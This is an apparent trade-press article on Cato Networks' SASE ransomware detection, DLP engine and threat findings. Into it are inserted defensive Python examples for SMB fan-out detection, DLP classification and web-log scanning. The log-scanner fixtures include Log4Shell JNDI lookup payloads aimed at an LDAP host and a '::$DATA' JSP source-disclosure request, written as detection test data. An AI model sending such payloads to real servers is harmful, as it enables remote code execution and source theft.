As secure access service edge (SASE) specialist Cato Networks burnishes its cyber credentials with the addition of multiple features to its platform, the company’s senior director of security strategy, Etay Maor, has urged users to challenge some of their preconceptions around security, using data drawn from Cato’s global network to counter some established cyber “truths”.
In June 2022, Cato became the first SASE supplier to add network-based ransomware protection to its platform, combining heuristic algorithms that scan server message block (SMB) protocol flows for attributes such as file properties and network or user behaviours, with the deep insights it already has into its network traffic from its day-to-day operations.
The algorithms were trained and tested against the firm’s existing data lake drawn from the Cato SASE Cloud – which holds over a trillion flows from Cato-connected edges.
The firm claims this will let it spot and stop the spread of ransomware across an organisation’s network by blocking SMB traffic to and from the source device to prevent lateral movement and file encryption.
Speaking to Computer Weekly, Maor, who joined Cato from IntSights, and is also an adjunct professor at the Woods College of Advancing Studies at Boston College, described a Black Basta ransomware attack to which he responded, in which the victim – an unnamed US organisation – could have benefited from this.
When he gained access to the victim’s security logs, Maor found that all the information that a ransomware attack was incoming was there, the security operations centre (SOC) team had just not been able to see it.
“I know it’s cool to get to sit in front of six screens, but what SOC analysts are trying to do is gather so much information and put it all together, so I understand why stuff is missed,” he said.
“In this case, it was remote desktop [RDP] to an Exchange server. Yes, they said, but that Exchange server doesn’t exist anymore so why attack a server that’s not there? So I had to introduce them to ransomware as a service [RaaS].
“What happened was someone else who attacked them sold their network data to someone else who wrote a script to automate the attack. They weren’t there for weeks, they were there for a minute, they didn’t know the victim had changed their Exchange server, but got lucky somewhere else.
“So if you can see east-west traffic, like an attempt to connect to a server that isn’t there, that should be a red flag to the SOC,” he explained. “We created our heuristic algorithms to look for these quirks.”
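Two of the east-west heuristics described above, written out as an added example rather than Cato's own algorithm: a connection attempt to a host that the asset inventory says no longer exists (the RDP attempt against the retired Exchange server), and SMB fan-out from one source within a short window, the shape of ransomware spreading to file shares, answered by blocking SMB to and from that source. The inventory, the thresholds and the flow records are all constructed for illustration.

```python
# Added example (not Cato's algorithm): two east-west heuristics run over
# constructed flow records.
#   1. connection attempts to hosts that are gone (the decommissioned Exchange
#      server reached over RDP), checked against an asset inventory;
#   2. SMB fan-out from one source in a short window, answered by blocking SMB
#      to and from that source.
# The inventory, thresholds and flow records are assumptions for illustration.
from collections import defaultdict
from dataclasses import dataclass

RDP, SMB = 3389, 445


@dataclass(frozen=True)
class Flow:
    ts: int      # seconds since epoch (constructed)
    src: str
    dst: str
    dport: int


# Constructed asset inventory. 10.0.1.20 was the old Exchange server; it was
# replaced by 10.0.1.21 and no longer exists on the network.
ACTIVE_HOSTS = {"10.0.1.21", "10.0.2.10", "10.0.2.11", "10.0.2.12",
                "10.0.2.13", "10.0.2.14", "10.0.2.15", "10.0.3.3", "10.0.5.7"}
DECOMMISSIONED = {"10.0.1.20": "exchange-old"}

# Tunables (assumed): more than this many distinct SMB peers inside the window
# from a single source is treated as lateral movement.
SMB_FANOUT_THRESHOLD = 5
WINDOW_SECONDS = 60


def detect_stale_targets(flows):
    """Flag connection attempts to hosts the inventory says are gone or unknown.
    Returns a list of (src, dst, dport, reason)."""
    alerts = []
    for f in flows:
        if f.dst in DECOMMISSIONED:
            alerts.append((f.src, f.dst, f.dport,
                           f"target decommissioned ({DECOMMISSIONED[f.dst]})"))
        elif f.dst not in ACTIVE_HOSTS:
            alerts.append((f.src, f.dst, f.dport, "target not in inventory"))
    return alerts


def detect_smb_fanout(flows, threshold=SMB_FANOUT_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src: peers} for sources that opened SMB to more than `threshold`
    distinct hosts within any `window`-second span."""
    by_src = defaultdict(list)
    for f in sorted(flows, key=lambda f: f.ts):
        if f.dport == SMB:
            by_src[f.src].append(f)
    offenders = {}
    for src, fs in by_src.items():
        start = 0
        for end in range(len(fs)):            # sliding window over sorted flows
            while fs[end].ts - fs[start].ts > window:
                start += 1
            peers = {x.dst for x in fs[start:end + 1]}
            if len(peers) > threshold:
                offenders[src] = peers
                break
    return offenders


def smb_block_rules(offenders):
    """Containment: deny SMB in both directions for each offending source."""
    rules = []
    for src in sorted(offenders):
        rules.append(f"deny tcp from {src} to any port {SMB}")
        rules.append(f"deny tcp from any to {src} port {SMB}")
    return rules


# Constructed flow log: 10.0.5.7 tries RDP to the old Exchange host, then the
# new one, then fans out over SMB; 10.0.3.3 is ordinary file-share use.
SAMPLE_FLOWS = [
    Flow(1000, "10.0.5.7", "10.0.1.20", RDP),
    Flow(1002, "10.0.5.7", "10.0.1.21", RDP),
    Flow(1010, "10.0.3.3", "10.0.2.10", SMB),
    Flow(1015, "10.0.3.3", "10.0.2.11", SMB),
    Flow(1020, "10.0.5.7", "10.0.2.10", SMB),
    Flow(1021, "10.0.5.7", "10.0.2.11", SMB),
    Flow(1022, "10.0.5.7", "10.0.2.12", SMB),
    Flow(1023, "10.0.5.7", "10.0.2.13", SMB),
    Flow(1024, "10.0.5.7", "10.0.2.14", SMB),
    Flow(1025, "10.0.5.7", "10.0.2.15", SMB),
]

if __name__ == "__main__":
    for a in detect_stale_targets(SAMPLE_FLOWS):
        print("ALERT", a)
    for rule in smb_block_rules(detect_smb_fanout(SAMPLE_FLOWS)):
        print("BLOCK", rule)
```

The stale-target check is only as good as the inventory behind it: a retired host that is never removed from the list, or a new one never added, produces silence or noise respectively, which is the gap the SOC in the story fell into. The fan-out threshold has to be tuned per environment (backup servers and vulnerability scanners legitimately touch many SMB peers) and those sources belong on an exclusion list rather than having the threshold raised for everyone.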
Maor said he wanted to explode the myth – favoured by presenters at security conferences – that attackers need to get lucky only once, while defenders need to get lucky all the time.
“When you look at MITRE ATT&CK and see how attackers operate, you soon see that saying is the opposite of the truth. Attackers have to be successful at phishing, gaining an endpoint, lateral movement, privilege escalation, downloading malware payloads, et cetera.
“You actually realise that attackers need to be right all the time, but defenders need to be right only at one point to protect, defend and mitigate,” he said.
Cato is now going further still, adding a data loss prevention (DLP) engine intended to protect data across all enterprise applications without requiring customers to write “complex and cumbersome” DLP rules. It forms part of Cato’s SSE 360 architecture and is designed to address what the firm describes as the limitations of traditional DLP products.
For example, legacy DLP may have inaccurate rules that block legitimate activities – or, worse still, allow illegitimate ones – while a focus on public cloud applications is leaving sensitive data in proprietary or unsanctioned applications exposed.
Added to that, investment in legacy DLP solutions does not help provide protection from other threat vectors.
Cato believes it has these problems licked by scanning traffic across the network for sensitive files and data types that the customer defines. The engine is said to identify more than 350 distinct data types; once a transaction is classified, customer-defined rules block it, raise an alert or let it through.
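What a block/alert/allow policy of that kind looks like in code, as an added example rather than Cato's engine: a classifier that labels a payload with data types, and a rule table keyed on data type and destination application. The Luhn checksum on the card-number detector is the kind of detail that separates a usable rule from the “inaccurate rules that block legitimate activities” mentioned above, since a bare sixteen-digit pattern also matches order and tracking numbers. The two data types, the rule table, the application names and the sample payloads are constructed for illustration.

```python
# Added example (not Cato's DLP engine): a content check that classifies a
# payload into data types and then applies customer-defined block/alert/allow
# rules per type and destination application. The two data types, the rule
# table and the sample payloads are constructed for illustration.
import re


def luhn_ok(digits):
    """Luhn checksum. A bare 'sixteen digits' rule blocks order numbers and
    tracking IDs too; the checksum rejects nine in ten random digit strings."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


CARD_RE = re.compile(r"\b(?:\d[ -]?){15}\d\b")
# SSN: area 000/666/9xx, group 00 and serial 0000 are never issued.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")


def classify(text):
    """Return the set of data-type labels present in text."""
    found = set()
    for m in CARD_RE.finditer(text):
        if luhn_ok(re.sub(r"[ -]", "", m.group())):
            found.add("payment_card")
    if SSN_RE.search(text):
        found.add("us_ssn")
    return found


# Customer-defined policy (assumed shape). For each data type the first rule
# whose app matches applies; "*" is any application.
RULES = [
    {"data_type": "payment_card", "app": "*", "action": "block"},
    {"data_type": "us_ssn", "app": "hr-portal", "action": "allow"},
    {"data_type": "us_ssn", "app": "*", "action": "alert"},
]
SEVERITY = {"allow": 0, "alert": 1, "block": 2}


def decide(text, app):
    """Evaluate the policy for one transaction. Where several data types are
    present the most restrictive matching action wins."""
    types = classify(text)
    action = "allow"
    for t in sorted(types):
        for rule in RULES:
            if rule["data_type"] == t and rule["app"] in ("*", app):
                if SEVERITY[rule["action"]] > SEVERITY[action]:
                    action = rule["action"]
                break
    return action, types


if __name__ == "__main__":
    for payload, app in [
        ("Order 1234567890123456 has shipped", "shipping"),   # fails Luhn: allowed
        ("card 4111 1111 1111 1111 exp 12/29", "slack"),       # test card, passes Luhn
        ("SSN 123-45-6789 for onboarding", "hr-portal"),
        ("SSN 123-45-6789 for onboarding", "gmail"),
    ]:
        print(app, decide(payload, app))
```

Two design points carry over to any real engine. First, per-type rules are resolved independently and the most restrictive action wins, so a payload that is allowed for one reason cannot smuggle out data that another rule would block. Second, the “allow” rule is scoped to a named application; an unscoped allow is the “allow illegitimate ones” failure the article warns about.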
Threat visibility
Since joining Cato, Maor has been creating quarterly threat landscape reports using data drawn from the firm’s global network, and the latest edition of this report also challenges established cyber thinking in many ways.
For example, after a few days immersed in the security community, one might reasonably expect most cyber attacks to originate from countries such as China or Russia, but Cato’s data show this is far from the case.
In fact, during the first three months of 2022, the most malicious activity originated from within the US, followed by China, Germany, the UK and Japan. Note that this data concerns malware command and control (C2) communications, so what it actually shows is which countries host the most C2 servers, not where the operators themselves are.
Maor said that understanding where attacks really originate from should be a crucial part of a defender’s visibility into threats and trends. Attackers know full well that many organisations will add countries such as China or Russia to their deny lists or at the very least closely inspect traffic from those jurisdictions – therefore, he said, it makes perfect sense for them to base their C2 infrastructure in countries that organisations perceive as safer.
Cato’s report also pulled data on the most-abused cloud applications – Microsoft, Google, RingCentral, AWS and Facebook in that order – with Telegram, TikTok and YouTube also in vogue, likely as a result of the Russia-Ukraine war.
The report also showed the most targeted common vulnerabilities and exposures (CVEs) – predictably, Log4Shell was the runaway “winner” here, with more than 24 million exploit attempts seen in Cato’s telemetry, but in second place was CVE-2009-2445, a 13-year-old vulnerability in Oracle iPlanet Web Server (formerly Sun Java System Web Server, and before that Sun ONE Web Server) that lets an attacker read the source code of JSP files by requesting them with alternate data stream syntax.
“With such old vulnerabilities, people are completely unaware of them,” said Maor. “[It shows] the way defenders look at the network is completely different from how attackers do – defenders will send me a PDF visual file of their servers, DMZ, cloud, et cetera, [but] attackers will say, ‘Hey, you have a 14-year-old server, that’s interesting’.”
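A SOC-side check for the two CVEs the report singles out, as an added example that is not from Cato's report or telemetry: Log4Shell (CVE-2021-44228) lookups are searched in the request path, referer and user-agent after percent-decoding and undoing the common `${lower:x}` and `${::-x}` obfuscations, and CVE-2009-2445 attempts are requests for a JSP with the NTFS alternate data stream suffix `::$DATA`. The log lines are constructed (documentation IP ranges), and the decoding is a simplification of what a WAF does, not a replacement for one.

```python
# Added example (not from the report): web-log checks for the two most
# targeted CVEs named above. Log4Shell (CVE-2021-44228) lookups are searched
# in the path, referer and user-agent after percent-decoding and undoing the
# common ${lower:x} / ${::-x} obfuscations; CVE-2009-2445 attempts are
# requests for a JSP with the NTFS alternate data stream suffix ::$DATA.
# The log lines are constructed; the decoding is a simplification of what a
# WAF does, not a substitute for one.
import re
from urllib.parse import unquote

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
JNDI_RE = re.compile(r"\$\{\s*jndi:")
ADS_RE = re.compile(r"\.jsp::\$data\b")


def deobfuscate(s):
    """Collapse single-character lookups such as ${lower:j} and ${::-j} to the
    character, repeatedly, so ${${lower:j}ndi:...} becomes ${jndi:...}."""
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"\$\{(?:lower|upper):(.)\}", r"\1", s)
        s = re.sub(r"\$\{::-(.)\}", r"\1", s)
    return s


def normalise(field):
    for _ in range(2):            # attackers double-encode; decode twice
        field = unquote(field)
    return deobfuscate(field.lower())


def classify_request(line):
    """Return a list of (ip, cve, field, status) hits for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, status = m.group("ip"), int(m.group("status"))
    hits = []
    for field in ("path", "referer", "ua"):
        if JNDI_RE.search(normalise(m.group(field))):
            hits.append((ip, "CVE-2021-44228", field, status))
    if ADS_RE.search(normalise(m.group("path"))):
        hits.append((ip, "CVE-2009-2445", "path", status))
    return hits


def scan(lines):
    return [hit for line in lines for hit in classify_request(line)]


# Constructed log lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2022:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2022:10:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Mar/2022:10:12:04 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.81.0"',
    '198.51.100.23 - - [10/Mar/2022:10:13:00 +0000] "GET /login.jsp::$DATA HTTP/1.1" 200 2048 "-" "python-requests/2.27.1"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The status code is carried in each hit for a reason: a `::$DATA` request answered with 200 and a non-trivial body is worth triaging as a possible source disclosure, whereas a 404 is reconnaissance. Either way the attempt is a signal even on an estate with no iPlanet servers at all, which is the point Maor makes about attackers looking for the old server that defenders have stopped thinking about.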